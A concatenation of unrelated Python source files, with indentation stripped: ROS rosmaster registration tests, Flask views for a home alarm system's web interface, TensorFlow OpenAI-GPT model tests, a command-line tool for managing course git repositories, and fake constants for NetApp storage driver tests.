self.assertEquals([], n.services)
self.assertEquals([], n.topic_subscriptions)
self.assertEquals([], n.param_subscriptions)
# - checks publishers
self.assert_('http://newone:1' in rm.publishers.get_apis('pub1'))
# - checks subscribers
self.assert_(rm.subscribers.has_key('sub1'))
self.failIf('http://one:1' in rm.subscribers.get_apis('sub1'))
# - checks param subscribers
self.assert_(rm.param_subscribers.has_key('p1'))
self.failIf('http://one:1' in rm.param_subscribers.get_apis('p1'))
# erase caller2 pub/sub/params via register_service
# - initial state
self.assert_('http://two:1' in rm.publishers.get_apis('pub1'))
self.assert_('http://two:1' in rm.subscribers.get_apis('sub1'))
self.assert_('http://two:1' in rm.param_subscribers.get_apis('p1'))
# - change ownership of s1 to caller2
rm.register_service('s1', 'caller2', 'http://two:1', 'rosrpc://two:1')
self.assert_('http://two:1' in rm.services.get_apis('s1'))
self.assert_('http://two:1' in rm.publishers.get_apis('pub1'))
self.assert_('http://two:1' in rm.subscribers.get_apis('sub1'))
self.assert_('http://two:1' in rm.param_subscribers.get_apis('p1'))
rm.register_service('s1', 'caller2', 'http://newtwo:1', 'rosrpc://newtwo:1')
self.assertEquals('http://newone:1', rm.get_node('caller1').api)
# - check node ref
n = rm.get_node('caller2')
self.assertEquals([], n.topic_publications)
self.assertEquals(['s1'], n.services)
self.assertEquals([], n.topic_subscriptions)
self.assertEquals([], n.param_subscriptions)
# - checks publishers
self.assert_(rm.publishers.has_key('pub1'))
self.failIf('http://two:1' in rm.publishers.get_apis('pub1'))
# - checks subscribers
self.assert_(rm.subscribers.has_key('sub1'))
self.failIf('http://two:1' in rm.subscribers.get_apis('sub1'))
self.assertEquals([['sub1', ['caller3']]], rm.subscribers.get_state())
# - checks param subscribers
self.assert_(rm.param_subscribers.has_key('p1'))
self.failIf('http://two:1' in rm.param_subscribers.get_apis('p1'))
self.assertEquals([['p1', ['caller3']]], rm.param_subscribers.get_state())
def test_Registrations_unregister_all(self):
import rosmaster.exceptions
from rosmaster.registrations import Registrations
r = Registrations(Registrations.TOPIC_SUBSCRIPTIONS)
for k in ['topic1', 'topic1b', 'topic1c', 'topic1d']:
r.register(k, 'node1', 'http://node1:5678')
r.register('topic2', 'node2', 'http://node2:5678')
r.unregister_all('node1')
self.failIf(not r)
for k in ['topic1', 'topic1b', 'topic1c', 'topic1d']:
self.failIf(r.has_key(k))
self.assertEquals(['topic2'], [k for k in r.iterkeys()])
r = Registrations(Registrations.TOPIC_PUBLICATIONS)
for k in ['topic1', 'topic1b', 'topic1c', 'topic1d']:
r.register(k, 'node1', 'http://node1:5678')
r.register('topic2', 'node2', 'http://node2:5678')
r.unregister_all('node1')
self.failIf(not r)
for k in ['topic1', 'topic1b', 'topic1c', 'topic1d']:
self.failIf(r.has_key(k))
self.assertEquals(['topic2'], [k for k in r.iterkeys()])
r = Registrations(Registrations.PARAM_SUBSCRIPTIONS)
r.register('param2', 'node2', 'http://node2:5678')
for k in ['param1', 'param1b', 'param1c', 'param1d']:
r.register(k, 'node1', 'http://node1:5678')
r.unregister_all('node1')
self.failIf(not r)
for k in ['param1', 'param1b', 'param1c', 'param1d']:
self.failIf(r.has_key(k))
self.assertEquals(['param2'], [k for k in r.iterkeys()])
r = Registrations(Registrations.SERVICE)
for k in ['service1', 'service1b', 'service1c', 'service1d']:
r.register(k, 'node1', 'http://node1:5678', 'rosrpc://node1:1234')
r.register('service2', 'node2', 'http://node2:5678', 'rosrpc://node2:1234')
r.unregister_all('node1')
self.failIf(not r)
for k in ['service1', 'service1b', 'service1c', 'service1d']:
self.failIf(r.has_key(k))
self.assertEquals(None, r.get_service_api(k))
self.assertEquals(['service2'], [k for k in r.iterkeys()])
self.assertEquals('rosrpc://node2:1234', r.get_service_api('service2'))
def _subtest_Registrations_services(self, r):
import rosmaster.exceptions
# call methods that use service_api_map, make sure they are guarded against lazy-init
self.assertEquals(None, r.get_service_api('s1'))
r.unregister_all('node1')
# do an unregister first, before service_api is initialized
code, msg, val = r.unregister('s1', 'caller1', None, 'rosrpc://one:1234')
self.assertEquals(1, code)
self.assertEquals(0, val)
try:
r.register('service1', 'node1', 'http://node1:5678')
self.fail("should require service_api")
except rosmaster.exceptions.InternalException: pass
r.register('service1', 'node1', 'http://node1:5678', 'rosrpc://node1:1234')
self.assert_('service1' in r) # test contains
self.assert_(r.has_key('service1')) # test contains
self.assertEquals(['service1'], [k for k in r.iterkeys()])
self.assertEquals(['http://node1:5678'], r.get_apis('service1'))
self.assertEquals('rosrpc://node1:1234', r.get_service_api('service1'))
self.assertEquals([('node1', 'http://node1:5678')], r['service1'])
self.failIf(not r) #test nonzero
self.assertEquals([['service1', ['node1']]], r.get_state())
r.register('service1', 'node2', 'http://node2:5678', 'rosrpc://node2:1234')
self.assertEquals(['service1'], [k for k in r.iterkeys()])
self.assertEquals('rosrpc://node2:1234', r.get_service_api('service1'))
self.assertEquals(['http://node2:5678'], r.get_apis('service1'))
self.assertEquals([('node2', 'http://node2:5678')], r['service1'])
self.assertEquals([['service1', ['node2']]], r.get_state())
# register a second service
r.register('service2', 'node3', 'http://node3:5678', 'rosrpc://node3:1234')
self.assertEquals('rosrpc://node3:1234', r.get_service_api('service2'))
self.assertEquals(2, len(r.get_state()))
self.assert_(['service2', ['node3']] in r.get_state(), r.get_state())
self.assert_(['service1', ['node2']] in r.get_state())
# register a third service, second service for node2
r.register('service1b', 'node2', 'http://node2:5678', 'rosrpc://node2:1234')
self.assertEquals(3, len(r.get_state()))
self.assert_(['service2', ['node3']] in r.get_state())
self.assert_(['service1b', ['node2']] in r.get_state())
self.assert_(['service1', ['node2']] in r.get_state())
# Unregister
try:
r.unregister('service1', 'node2', 'http://node2:1234')
self.fail("service_api param must be specified")
except rosmaster.exceptions.InternalException: pass
# - fail if service is not known
code, _, val = r.unregister('unknown', 'node2', 'http://node2:5678', 'rosprc://node2:1234')
self.assertEquals(0, val)
# - fail if node is not registered
code, _, val = r.unregister('service1', 'node3', 'http://node3:5678', 'rosrpc://node3:1234')
self.assertEquals(0, val)
# - fail if service API is different
code, _, val = r.unregister('service1', 'node2', 'http://node2b:5678', 'rosrpc://node3:1234')
self.assertEquals(0, val)
# - unregister service2
code, _, val = r.unregister('service2', 'node3', 'http://node3:5678', 'rosrpc://node3:1234')
self.assertEquals(1, code)
self.assertEquals(1, val)
self.failIf('service2' in r) # test contains
self.failIf(r.has_key('service2'))
self.assert_('service1' in [k for k in r.iterkeys()])
self.assert_('service1b' in [k for k in r.iterkeys()])
self.assertEquals([], r.get_apis('service2'))
self.assertEquals([], r['service2'])
self.failIf(not r) #test nonzero
self.assertEquals(2, len(r.get_state()))
self.failIf(['service2', ['node3']] in r.get_state())
# - unregister node2
code, _, val = r.unregister('service1', 'node2', 'http://node2:5678', 'rosrpc://node2:1234')
self.assertEquals(1, code)
self.assertEquals(1, val)
self.failIf('service1' in r) # test contains
self.failIf(r.has_key('service1'))
self.assertEquals(['service1b'], [k for k in r.iterkeys()])
self.assertEquals([], r.get_apis('service1'))
self.assertEquals([], r['service1'])
self.failIf(not r) #test nonzero
self.assertEquals([['service1b', ['node2']]], r.get_state())
code, _, val = r.unregister('service1b', 'node2', 'http://node2:5678', 'rosrpc://node2:1234')
self.assertEquals(1, code)
self.assertEquals(1, val)
self.failIf('service1' in r) # test contains
self.failIf(r.has_key('service1'))
self.assertEquals([], [k for k in r.iterkeys()])
self.assertEquals([], r.get_apis('service1'))
self.assertEquals([], r['service1'])
self.assert_(not r) #test nonzero
self.assertEquals([], r.get_state())
|
|
#flask imports
from flask import render_template, flash, redirect, session, url_for, request, g
from flask.ext.login import login_user, logout_user, current_user, login_required
#app stuff
from app import app, db, lm, oid, models, admin
from flask.ext.admin.contrib.sqlamodel import ModelView
from flask.ext.admin.base import MenuLink, Admin, BaseView, expose
#import forms Flask.wtf
from forms import LoginForm
#import database models for FlaskAlchemy
from models import User, Zones, History, AlarmStatus, ValidUsers, Settings, Email
from models import ROLE_USER, ROLE_ADMIN
#import python exensions
from datetime import datetime
import re
import subprocess
#globals
SystemArmed = False
def CheckProcessRunning(process):
"""This function checks that alarmlogic.py is running, since it builds the db and keeps information up to date."""
s = subprocess.Popen(["ps", "axw"],stdout=subprocess.PIPE)
for x in s.stdout:
if re.search(process, x):
return True
return False
#User Loader Callback -
@lm.user_loader
def load_user(id):
return User.query.get(int(id))
#any fuctions decorated with @before_request will run this first
@app.before_request
def before_request():
g.user = current_user #copy flask global into the g. global object
#TODO: only check the proess if contnet is not static content... i e they want to go to a page that needs almlogic.
#note: this might slow down the UI! maybe just check on login page? we would like to know if the process crashes though...
# if CheckProcessRunning('alarmlogic.py') == False:
#check request url to avoid redirect loop (rightmost 10 chars)
# if request.path <> url_for('notrunning') and request.path[:7] <> '/static' and request.path[:8] <> '/favicon':
# return redirect(url_for('notrunning'))
# else:
#user refreshed after starting app
# if request.url[-10:] == url_for('notrunning')[-10:]:
# return redirect(url_for('index'))
#handle 404 nicely
@app.errorhandler(404)
def internal_error(error):
return render_template('404.html'), 404
#handle 500 nicely
@app.errorhandler(500)
def internal_error(error):
db.session.rollback()
return render_template('500.html'), 500
#default route
@app.route('/', methods = ['GET', 'POST'])
#index route
@app.route('/index', methods = ['GET', 'POST'])
@login_required
def index():
#get armed status from database.
armed = AlarmStatus.query.filter_by(attribute = 'Armed').first()
if armed.value == '1':
ArmedStatus = True
else:
ArmedStatus = False
#notify user if a zone is not secured (but don't keep them from arming with that status)
zonesbreached = Zones.query.filter_by(secured = 0).first()
if zonesbreached is None:
flash('All zones secured.')
else:
flash('One or more zones not secured.')
return render_template('index.html',
title = 'Overview', ArmedStatus = ArmedStatus)
#almlogic.py not running
@app.route('/notrunning')
def notrunning():
#TODO: Allow user to (re)start almlogic.py if logged in?
return render_template('notrunning.html',title = 'Doh. ')
#arm the system
@app.route('/arm')
@login_required
def arm():
armed = AlarmStatus.query.filter_by(attribute = 'Armed').first()
armed.value = '1'
db.session.add(armed)
now = datetime.now()
hist = History(source = g.user.nickname, event = 'Armed By User', timestamp = now)
db.session.add(hist)
db.session.commit() #write data
flash('The system has been Armed.')
return redirect(url_for('index'))
#disarm the system
@app.route('/disarm')
@login_required
def disarm():
#disarm the system (almlogic.py program handles that)
armed = AlarmStatus.query.filter_by(attribute = 'Armed').first()
armed.value = '0'
db.session.add(armed)
now = datetime.now()
hist = History(source = g.user.nickname, event = 'Disarmed By User', timestamp = now)
db.session.add(hist)
db.session.commit() #write data
flash('The system has been Disarmed.')
return redirect(url_for('index'))
#login route
@app.route('/login', methods = ['GET', 'POST'])
@oid.loginhandler
def login():
if g.user is not None and g.user.is_authenticated(): #do we have a valid logged in user?
return redirect(url_for('index')) #redirect to index
form = LoginForm()
if form.validate_on_submit():
session['remember_me'] = form.remember_me.data #store remember me box of form to session variable
return oid.try_login(form.openid.data, ask_for = ['nickname', 'email']) #openID login call
return render_template('login.html',
title = 'Sign In',
form = form,
providers = app.config['OPENID_PROVIDERS'])
@oid.after_login
def after_login(resp):
#do we have valid users yet?
user = User.query.filter_by(email = resp.email).first() #find user in db
if user is None: #if not found... this is the first user to log in. Make them admin for easy setup
nickname = resp.nickname
if nickname is None or nickname == "": #build nickname if null
nickname = resp.email.split('@')[0]
user = User(nickname = nickname, email = resp.email, role = ROLE_ADMIN)
db.session.add(user)
db.session.commit()
#Add this user to the Email list automatically as well:
emailuser = Email(email = resp.email, html = True)
db.session.add(user)
db.session.commit()
# Is the email returned from OpenID valid, and is the user allowed on the system?
# query for this user
Valid_Users = ValidUsers.query.filter_by(email = resp.email).first()
#do we have any valid users yet?
if Valid_Users is None:
#no valid users, this is the admin logging in the first time.
u = ValidUsers(email = resp.email)
db.session.add(u)
db.session.commit()
#some valid users exist, do we have this user in our db?
elif resp.email is None or resp.email == "" or resp.email not in Valid_Users.email:
flash('Invalid login. You have not been granted access to this system.')
return redirect(url_for('login'))
remember_me = False
if 'remember_me' in session: #do we want to remember this user?
remember_me = session['remember_me'] #copy value from session
session.pop('remember_me', None) #clear session value..?
login_user(user, remember = remember_me) #feed flask the user and remember status
return redirect(request.args.get('next') or url_for('index')) #return page the user wanted, or index if none reqd.
#define log out user route
@app.route('/logout')
def logout():
logout_user()
return redirect(url_for('index'))
#define history route
@app.route('/history')
@app.route('/history/<int:page>')
@login_required
def history(page = 1):
#pull paginated history from db... paginate(page,items per page,empty list on error)
NumNotices = models.Settings.query.filter_by(attribute = 'NoticesPerPage').first()
HISTORY = models.History.query.order_by("timestamp desc").paginate(page, int(NumNotices.value), False)
return render_template('history.html',title = 'History', history = HISTORY,curr_page = page) #pass history to history template
@app.route('/clearhistory')
@login_required
def clearhistory():
#TODO: There is a better way to do this I'm sure.
#TODO: Add Confirmation popup or something. Also, this should go on the admin page.
REMHIST = models.History.query.all() #pull history data from database
for delhist in REMHIST:
db.session.delete(delhist)
db.session.commit()
flash('History Cleared by User.')
return redirect(url_for('history'))
#define zones route
@app.route('/zones')
@login_required
def zones():
ZONES = models.Zones.query.all() #pull zones list from DB
return render_template('zones.html',title = 'Zones',zones = ZONES) #pass ZONE information to zones template
#===================
#flask-Admin Section
#===================
#define custom flask-Admin view
class UserView(ModelView):
# Disable model creation
can_create = False
can_edit = True
can_delete = True
def __init__(self, session, **kwargs):
# You can pass name and other parameters if you want to
super(UserView, self).__init__(User, session, **kwargs)
def is_accessible(self):
if g.user.is_authenticated():
return g.user.role #ROLE_ADMIN == 1, user = 0
else: #anonymous user
return 0
class ZoneView(ModelView):
def __init__(self, session, **kwargs):
# You can pass name and other parameters if you want to
super(ZoneView, self).__init__(Zones, session, **kwargs)
def is_accessible(self):
if g.user.is_authenticated():
return g.user.role #ROLE_ADMIN == 1, user = 0
else: #anonymous user
return 0
class ValidUsersView(ModelView):
def __init__(self, session, **kwargs):
# You can pass name and other parameters if you want to
super(ValidUsersView, self).__init__(ValidUsers, session, **kwargs)
def is_accessible(self):
if g.user.is_authenticated():
return g.user.role #ROLE_ADMIN == 1, user = 0
else: #anonymous user
return 0
class SettingsView(ModelView):
def __init__(self, session, **kwargs):
# You can pass name and other parameters if you want to
super(SettingsView, self).__init__(Settings, session, **kwargs)
def is_accessible(self):
if g.user.is_authenticated():
return g.user.role #ROLE_ADMIN == 1, user = 0
else: #anonymous user
return 0
class EmailView(ModelView):
def __init__(self, session, **kwargs):
# You can pass name and other parameters if you want to
super(EmailView, self).__init__(Email, session, **kwargs)
def is_accessible(self):
if g.user.is_authenticated():
return g.user.role #ROLE_ADMIN == 1, user = 0
else: #anonymous user
return 0
#add flask admin views
admin.add_view(UserView(db.session))
admin.add_view(ZoneView(db.session))
admin.add_view(ValidUsersView(db.session))
admin.add_view(SettingsView(db.session))
admin.add_view(EmailView(db.session))
admin.add_link(MenuLink(name='Clear History', url='/clearhistory'))
admin.add_link(MenuLink(name='Exit Admin', url='/'))
|
|
# coding=utf-8
# Copyright 2020 The HuggingFace Team. All rights reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import unittest
from transformers import OpenAIGPTConfig, is_tf_available
from transformers.testing_utils import require_tf, slow
from .test_configuration_common import ConfigTester
from .test_modeling_tf_common import TFModelTesterMixin, ids_tensor
if is_tf_available():
import tensorflow as tf
from transformers.models.openai.modeling_tf_openai import (
TF_OPENAI_GPT_PRETRAINED_MODEL_ARCHIVE_LIST,
TFOpenAIGPTDoubleHeadsModel,
TFOpenAIGPTForSequenceClassification,
TFOpenAIGPTLMHeadModel,
TFOpenAIGPTModel,
)
class TFOpenAIGPTModelTester:
def __init__(
self,
parent,
):
self.parent = parent
self.batch_size = 13
self.seq_length = 7
self.is_training = True
self.use_token_type_ids = True
self.use_input_mask = True
self.use_labels = True
self.use_mc_token_ids = True
self.vocab_size = 99
self.hidden_size = 32
self.num_hidden_layers = 5
self.num_attention_heads = 4
self.intermediate_size = 37
self.hidden_act = "gelu"
self.hidden_dropout_prob = 0.1
self.attention_probs_dropout_prob = 0.1
self.max_position_embeddings = 512
self.type_vocab_size = 16
self.type_sequence_label_size = 2
self.initializer_range = 0.02
self.num_labels = 3
self.num_choices = 4
self.scope = None
self.pad_token_id = self.vocab_size - 1
def prepare_config_and_inputs(self):
input_ids = ids_tensor([self.batch_size, self.seq_length], self.vocab_size)
input_mask = None
if self.use_input_mask:
input_mask = ids_tensor([self.batch_size, self.seq_length], vocab_size=2)
token_type_ids = None
if self.use_token_type_ids:
token_type_ids = ids_tensor([self.batch_size, self.seq_length], self.type_vocab_size)
mc_token_ids = None
if self.use_mc_token_ids:
mc_token_ids = ids_tensor([self.batch_size, self.num_choices], self.seq_length)
sequence_labels = None
token_labels = None
choice_labels = None
if self.use_labels:
sequence_labels = ids_tensor([self.batch_size], self.type_sequence_label_size)
token_labels = ids_tensor([self.batch_size, self.seq_length], self.num_labels)
choice_labels = ids_tensor([self.batch_size], self.num_choices)
config = OpenAIGPTConfig(
vocab_size=self.vocab_size,
n_embd=self.hidden_size,
n_layer=self.num_hidden_layers,
n_head=self.num_attention_heads,
# intermediate_size=self.intermediate_size,
# hidden_act=self.hidden_act,
# hidden_dropout_prob=self.hidden_dropout_prob,
# attention_probs_dropout_prob=self.attention_probs_dropout_prob,
n_positions=self.max_position_embeddings,
n_ctx=self.max_position_embeddings,
# type_vocab_size=self.type_vocab_size,
# initializer_range=self.initializer_range,
pad_token_id=self.pad_token_id,
)
head_mask = ids_tensor([self.num_hidden_layers, self.num_attention_heads], 2)
return (
config,
input_ids,
input_mask,
head_mask,
token_type_ids,
mc_token_ids,
sequence_labels,
token_labels,
choice_labels,
)
def create_and_check_openai_gpt_model(self, config, input_ids, input_mask, head_mask, token_type_ids, *args):
model = TFOpenAIGPTModel(config=config)
inputs = {"input_ids": input_ids, "attention_mask": input_mask, "token_type_ids": token_type_ids}
result = model(inputs)
inputs = [input_ids, input_mask]
result = model(inputs)
result = model(input_ids)
self.parent.assertEqual(result.last_hidden_state.shape, (self.batch_size, self.seq_length, self.hidden_size))
def create_and_check_openai_gpt_lm_head(self, config, input_ids, input_mask, head_mask, token_type_ids, *args):
model = TFOpenAIGPTLMHeadModel(config=config)
inputs = {"input_ids": input_ids, "attention_mask": input_mask, "token_type_ids": token_type_ids}
result = model(inputs)
self.parent.assertEqual(result.logits.shape, (self.batch_size, self.seq_length, self.vocab_size))
def create_and_check_openai_gpt_double_head(
self, config, input_ids, input_mask, head_mask, token_type_ids, mc_token_ids, *args
):
model = TFOpenAIGPTDoubleHeadsModel(config=config)
multiple_choice_inputs_ids = tf.tile(tf.expand_dims(input_ids, 1), (1, self.num_choices, 1))
multiple_choice_input_mask = tf.tile(tf.expand_dims(input_mask, 1), (1, self.num_choices, 1))
multiple_choice_token_type_ids = tf.tile(tf.expand_dims(token_type_ids, 1), (1, self.num_choices, 1))
inputs = {
"input_ids": multiple_choice_inputs_ids,
"mc_token_ids": mc_token_ids,
"attention_mask": multiple_choice_input_mask,
"token_type_ids": multiple_choice_token_type_ids,
}
result = model(inputs)
self.parent.assertEqual(
result.logits.shape, (self.batch_size, self.num_choices, self.seq_length, self.vocab_size)
)
self.parent.assertEqual(result.mc_logits.shape, (self.batch_size, self.num_choices))
def create_and_check_openai_gpt_for_sequence_classification(
self, config, input_ids, input_mask, head_mask, token_type_ids, *args
):
config.num_labels = self.num_labels
sequence_labels = ids_tensor([self.batch_size], self.type_sequence_label_size)
inputs = {
"input_ids": input_ids,
"attention_mask": input_mask,
"token_type_ids": token_type_ids,
"labels": sequence_labels,
}
model = TFOpenAIGPTForSequenceClassification(config)
result = model(inputs)
self.parent.assertEqual(result.logits.shape, (self.batch_size, self.num_labels))
def prepare_config_and_inputs_for_common(self):
config_and_inputs = self.prepare_config_and_inputs()
(
config,
input_ids,
input_mask,
head_mask,
token_type_ids,
mc_token_ids,
sequence_labels,
token_labels,
choice_labels,
) = config_and_inputs
inputs_dict = {"input_ids": input_ids, "token_type_ids": token_type_ids, "attention_mask": input_mask}
return config, inputs_dict
@require_tf
class TFOpenAIGPTModelTest(TFModelTesterMixin, unittest.TestCase):
all_model_classes = (
(TFOpenAIGPTModel, TFOpenAIGPTLMHeadModel, TFOpenAIGPTDoubleHeadsModel, TFOpenAIGPTForSequenceClassification)
if is_tf_available()
else ()
)
all_generative_model_classes = (
(TFOpenAIGPTLMHeadModel,) if is_tf_available() else ()
) # TODO (PVP): Add Double HeadsModel when generate() function is changed accordingly
test_head_masking = False
test_onnx = False
def setUp(self):
self.model_tester = TFOpenAIGPTModelTester(self)
self.config_tester = ConfigTester(self, config_class=OpenAIGPTConfig, n_embd=37)
def test_config(self):
self.config_tester.run_common_tests()
def test_openai_gpt_model(self):
config_and_inputs = self.model_tester.prepare_config_and_inputs()
self.model_tester.create_and_check_openai_gpt_model(*config_and_inputs)
def test_openai_gpt_lm_head(self):
config_and_inputs = self.model_tester.prepare_config_and_inputs()
self.model_tester.create_and_check_openai_gpt_lm_head(*config_and_inputs)
def test_openai_gpt_double_head(self):
config_and_inputs = self.model_tester.prepare_config_and_inputs()
self.model_tester.create_and_check_openai_gpt_double_head(*config_and_inputs)
def test_model_common_attributes(self):
config, inputs_dict = self.model_tester.prepare_config_and_inputs_for_common()
for model_class in self.all_model_classes:
model = model_class(config)
assert isinstance(model.get_input_embeddings(), tf.keras.layers.Layer)
if model_class in self.all_generative_model_classes:
x = model.get_output_embeddings()
assert isinstance(x, tf.keras.layers.Layer)
name = model.get_bias()
assert name is None
else:
x = model.get_output_embeddings()
assert x is None
name = model.get_bias()
assert name is None
def test_openai_gpt_sequence_classification_model(self):
config_and_inputs = self.model_tester.prepare_config_and_inputs()
self.model_tester.create_and_check_openai_gpt_for_sequence_classification(*config_and_inputs)
@slow
def test_model_from_pretrained(self):
for model_name in TF_OPENAI_GPT_PRETRAINED_MODEL_ARCHIVE_LIST[:1]:
model = TFOpenAIGPTModel.from_pretrained(model_name)
self.assertIsNotNone(model)
@require_tf
class TFOPENAIGPTModelLanguageGenerationTest(unittest.TestCase):
@slow
def test_lm_generate_openai_gpt(self):
model = TFOpenAIGPTLMHeadModel.from_pretrained("openai-gpt")
input_ids = tf.convert_to_tensor([[481, 4735, 544]], dtype=tf.int32) # the president is
expected_output_ids = [
481,
4735,
544,
246,
963,
870,
762,
239,
244,
40477,
244,
249,
719,
881,
487,
544,
240,
244,
603,
481,
] # the president is a very good man. " \n " i\'m sure he is, " said the
output_ids = model.generate(input_ids, do_sample=False)
self.assertListEqual(output_ids[0].numpy().tolist(), expected_output_ids)
|
|
# -*- coding: utf-8 -*-
"""
Command line interface to orchestrion
"""
from __future__ import print_function
import argparse
from orcoursetrion import actions
def run_create_export_repo(args):
"""Run the create_export_repo action using args"""
repo = actions.create_export_repo(args.course, args.term, args.description)
print(
'Newly created repository for exports created at {0}'.format(
repo['html_url']
)
)
def run_rerun_studio(args):
"""Run the rerun_studio action using args"""
repo = actions.rerun_studio(args.course, args.term, args.new_term)
print(
'Web hooks removed from old repository and newly created repository '
'for exports created at {0}'.format(
repo['html_url']
)
)
def run_release_studio(args):
"""Run the release_studio action using args"""
actions.release_studio(args.course, args.term)
print('Added production Web hooks to course')
def run_create_xml_repo(args):
"""Run the create_xml_repo action using args"""
repo = actions.create_xml_repo(
args.course, args.term, args.team, args.member, args.description
)
print(
'Newly created repository for XML course created at {0}'.format(
repo['html_url']
)
)
def run_rerun_xml(args):
"""Run the rerun_xml action using args"""
num_deleted_hooks = actions.rerun_xml(args.course, args.term)
print(
"Successfully removed {0} hooks from course's repository.".format(
num_deleted_hooks
)
)
def run_release_xml(args):
"""Run the release_xml action using args"""
actions.release_xml(args.course, args.term)
print('Added production Web hooks to course')
def run_put_team(args):
"""Run the put_teams action using args"""
actions.put_team(
args.org, args.team, args.read_only, args.member
)
print('Team successfully modified/created.')
def execute():
"""Execute command line orcoursetrion actions.
"""
parser = argparse.ArgumentParser(
prog='orcoursetrion',
description=('Run an orchestrion action.\n')
)
subparsers = parser.add_subparsers(
title="Actions",
description='Valid actions',
)
# Setup subparsers for each action
# Create studio repository
create_export_repo = subparsers.add_parser(
'create_export_repo',
help='Create a Studio export git repository'
)
create_export_repo.add_argument(
'-c', '--course', type=str, required=True,
help='Course to work on (i.e. 6.0001)'
)
create_export_repo.add_argument(
'-t', '--term', type=str, required=True,
help='Term of the course (i.e. Spring_2015)'
)
create_export_repo.add_argument(
'-d', '--description', type=str,
help='Description string to set for repository'
)
create_export_repo.set_defaults(func=run_create_export_repo)
# Rerun Studio Course
rerun_studio = subparsers.add_parser(
'rerun_studio',
help='Rerun a Studio course'
)
rerun_studio.add_argument(
'-c', '--course', type=str, required=True,
help='Course to work on (i.e. 6.0001)'
)
rerun_studio.add_argument(
'-t', '--term', type=str, required=True,
help='Term of the course (i.e. Spring_2015)'
)
rerun_studio.add_argument(
'-n', '--new-term', type=str, required=True,
help='Term of the course (i.e. Spring_2015)'
)
rerun_studio.set_defaults(func=run_rerun_studio)
# Release Studio Course
release_studio = subparsers.add_parser(
'release_studio',
help='Release a Studio course (currently just add Web hooks)'
)
release_studio.add_argument(
'-c', '--course', type=str, required=True,
help='Course to work on (i.e. 6.0001)'
)
release_studio.add_argument(
'-t', '--term', type=str, required=True,
help='Term of the course (i.e. Spring_2015)'
)
release_studio.set_defaults(func=run_release_studio)
# Create XML repository
create_xml_repo = subparsers.add_parser(
'create_xml_repo',
help='Create an XML/latex2edx git repository'
)
create_xml_repo.add_argument(
'-c', '--course', type=str, required=True,
help='Course to work on (i.e. 6.0001)'
)
create_xml_repo.add_argument(
'-t', '--term', type=str, required=True,
help='Term of the course (i.e. Spring_2015)'
)
create_xml_repo.add_argument(
'-g', '--team', type=str, default=None,
help='Name of team in organization that should have access, creates' +
' new team with the same name as the repository if empty.'
)
create_xml_repo.add_argument(
'-m', '--member', nargs='*', type=str,
help='One or more usernames to replace/add to team membership.'
)
create_xml_repo.add_argument(
'-d', '--description', type=str,
help='Description string to set for repository'
)
create_xml_repo.set_defaults(func=run_create_xml_repo)
# Rerun XML Course
rerun_xml = subparsers.add_parser(
'rerun_xml',
help='Rerun an XML course (currently just deletes Web hooks)'
)
rerun_xml.add_argument(
'-c', '--course', type=str, required=True,
help='Course to work on (i.e. 6.0001)'
)
rerun_xml.add_argument(
'-t', '--term', type=str, required=True,
help='Term of the course (i.e. Spring_2015)'
)
rerun_xml.set_defaults(func=run_rerun_xml)
# Release XML Course
release_xml = subparsers.add_parser(
'release_xml',
help='Release an XML course (currently just adds Web hooks)'
)
release_xml.add_argument(
'-c', '--course', type=str, required=True,
help='Course to work on (i.e. 6.0001)'
)
release_xml.add_argument(
'-t', '--term', type=str, required=True,
help='Term of the course (i.e. Spring_2015)'
)
release_xml.set_defaults(func=run_release_xml)
# Create/Modify Team
put_team = subparsers.add_parser(
'put_team',
help='Create or modify a team in an organization'
)
put_team.add_argument(
'-o', '--org', type=str, required=True,
help='Organization for the team'
)
put_team.add_argument(
'-g', '--team', type=str, required=True,
help='Name of team in organization that should have access'
)
put_team.add_argument(
'-r', '--read_only', dest='read_only', action='store_true',
help='Team should only have pull access to repositories'
)
put_team.add_argument(
'-m', '--member', nargs='*', type=str,
help='One or more usernames to replace the membership of the team'
)
put_team.set_defaults(func=run_put_team)
# Run the action
args = parser.parse_args()
args.func(args)
|
|
# Copyright (c) - 2014, Clinton Knight. All rights reserved.
# Copyright (c) - 2015, Tom Barron. All rights reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
VOLUME_ID = 'f10d1a84-9b7b-427e-8fec-63c48b509a56'
LUN_ID = 'ee6b4cc7-477b-4016-aa0c-7127b4e3af86'
LUN_HANDLE = 'fake_lun_handle'
LUN_NAME = 'lun1'
LUN_SIZE = 3
LUN_TABLE = {LUN_NAME: None}
SIZE = 1024
HOST_NAME = 'fake.host.name'
BACKEND_NAME = 'fake_backend_name'
POOL_NAME = 'aggr1'
SHARE_IP = '192.168.99.24'
EXPORT_PATH = '/fake/export/path'
NFS_SHARE = '%s:%s' % (SHARE_IP, EXPORT_PATH)
HOST_STRING = '%s@%s#%s' % (HOST_NAME, BACKEND_NAME, POOL_NAME)
NFS_HOST_STRING = '%s@%s#%s' % (HOST_NAME, BACKEND_NAME, NFS_SHARE)
FLEXVOL = 'openstack-flexvol'
NFS_FILE_PATH = 'nfsvol'
PATH = '/vol/%s/%s' % (POOL_NAME, LUN_NAME)
LUN_METADATA = {
'OsType': None,
'SpaceReserved': 'true',
'Path': PATH,
'Qtree': None,
'Volume': POOL_NAME,
}
VOLUME = {
'name': LUN_NAME,
'size': SIZE,
'id': VOLUME_ID,
'host': HOST_STRING,
}
NFS_VOLUME = {
'name': NFS_FILE_PATH,
'size': SIZE,
'id': VOLUME_ID,
'host': NFS_HOST_STRING,
}
NETAPP_VOLUME = 'fake_netapp_volume'
UUID1 = '12345678-1234-5678-1234-567812345678'
LUN_PATH = '/vol/vol0/%s' % LUN_NAME
VSERVER_NAME = 'openstack-vserver'
FC_VOLUME = {'name': 'fake_volume'}
FC_INITIATORS = ['21000024ff406cc3', '21000024ff406cc2']
FC_FORMATTED_INITIATORS = ['21:00:00:24:ff:40:6c:c3',
